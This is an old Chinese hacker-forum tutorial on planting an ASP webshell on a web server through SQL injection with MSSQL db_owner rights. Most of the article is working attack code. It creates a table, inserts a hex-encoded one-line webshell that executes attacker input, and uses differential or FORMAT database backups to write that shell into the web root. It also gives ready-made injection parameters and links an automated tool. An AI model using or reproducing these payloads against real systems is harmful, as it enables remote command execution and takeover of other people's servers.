db_owner权限得到webshell我的两点改进 || 中国X黑客小组


	您现在的位置：中国X黑客小组 >> 技术文章 >> 黑客技术 >> 黑客教学 >> 文章正文	用户登录新用户注册

db_owner权限得到webshell我的两点改进

热 ★★★

【字体：小大】

db_owner权限得到webshell我的两点改进

作者：风中吟文章来源：http://www.icehack.com/ 点击数：更新时间：2005-2-17

作者：风中吟　　http://www.icehack.com/

减少备份文件大小，得到可执行的webshell成功率提高不少
一利用差异备份
加一个参数WITH DIFFERENTIAL
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s

create table [dbo].[xiaolu] ([cmd] [image]);

insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)

declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL

二利用完全FORMAT
加一个参数WITH FROMAT
有些页面对数据库要执行几次，而备份又默认是每次都以追加的方式，如果一个注入点对数据库有几次操作，而备份的文件就几倍的增加，所以
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s

create table [dbo].[xiaolu] ([cmd] [image]);

insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)

declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH FORMAT

总的来说就是那么简单几句,下面以备份数据库model为例子
1
id=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>')
2
id=1;backup database model to disk='你的路径‘ with differential,format;--

编者注：利用mssql差异备份获得webshell工具下载
http://soft.hackbase.com/41/20050216/6183.html

文章录入：IceRiver 责任编辑：IceRiver

上一篇文章： SafeNet SoftRemote VPN客户端内存明文密码泄露漏洞以及细节

下一篇文章：一次典型的虚拟主机入侵

【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】

最新热点		最新推荐		相关文章
				Microsoft 9月安全公告的摘要 “VB蠕虫变种MQ”病毒技术细用Dos命令加锁防止病毒格式假是真时真是假——or注入教活地运用SQL Injection做数据谷歌列举微软OOXML文档标准不 Skype用户须警惕新Windows蠕密保卡不再安全警惕WOW新式 McAfee发布Windows Mobile风 Cyanlotus：新型文本垃圾邮件

　网友评论：（只显示最新5条。评论内容只代表网友观点，与本站立场无关！）


关于我们 - 版权声明 - 帮助(？) - 广告服务 - 联系我们 - 友情链接 - 用户注册 -	Powered by ICE RIVER - STUDIO

» CnXHacker.CoM